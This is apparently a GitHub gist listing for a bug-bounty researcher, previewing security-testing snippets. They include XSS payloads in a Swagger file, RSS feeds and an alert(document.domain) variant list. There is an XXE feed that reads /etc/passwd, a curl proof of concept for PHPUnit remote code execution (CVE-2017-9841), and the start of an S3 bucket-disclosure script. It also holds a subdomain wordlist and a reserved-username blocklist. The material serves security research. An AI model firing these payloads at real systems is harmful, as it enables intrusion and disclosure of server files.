Yassine ABOUKIR yassineaboukir
🐐
yassineaboukir
/ index.yaml
Last active
August 29, 2023 12:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
yassineaboukir
/ poc.js
Created
May 7, 2022 22:42
— forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
yassineaboukir
/ rss2.xml
Last active
March 16, 2022 18:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>Data <![CDATA[<]]>script<![CDATA[>]]>alert(0)<![CDATA[<]]>/script<![CDATA[>]]></title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> | |
| <lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate> | |
| <generator>Libsyn <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]> 2.0</generator> | |
| <link>http://dataskeptic.com</link> | |
| <language>en</language> |
yassineaboukir
/ rss.xml
Last active
March 17, 2022 15:45
Malicious RSS for security testing purposes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE xxe [ | |
| <!ENTITY xxe SYSTEM | |
| "file:///etc/passwd" > | |
| ]> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>&xxe</title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> |
yassineaboukir
/ bucket-disclose.sh
Created
October 5, 2021 16:55
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
yassineaboukir
/ twitterFollowerCuratorBot.php
Created
May 27, 2021 13:05
— forked from levelsio/twitterFollowerCuratorBot.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| // | |
| // AUTO KEYWORD-BASED FOLLOWER CURATION BOT (by @levelsio) | |
| // | |
| // File: twitterFollowerCuratorBot.php | |
| // | |
| // Created: May 2021 | |
| // License: MIT | |
| // |
yassineaboukir
/ alert.js
Created
March 24, 2021 14:08
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
yassineaboukir
/ gist:1501de6f60dce148824d3001e83fb263
Created
September 10, 2020 11:17
PHPunit RCE PoC (CVE-2017-9841)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | |
| Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/ |
yassineaboukir
/ all.txt
Created
February 15, 2020 09:04
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
yassineaboukir
/ gist:726992bd1f0a4eb637d150b7b5c66079
Last active
May 4, 2024 12:30
List of reserved names to blacklist from registration/username claim for security reasons and RFC compliance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| abuse | |
| admin | |
| administrator | |
| ftp | |
| hostmaster | |
| info | |
| is | |
| it | |
| list | |
| list-request |
NewerOlder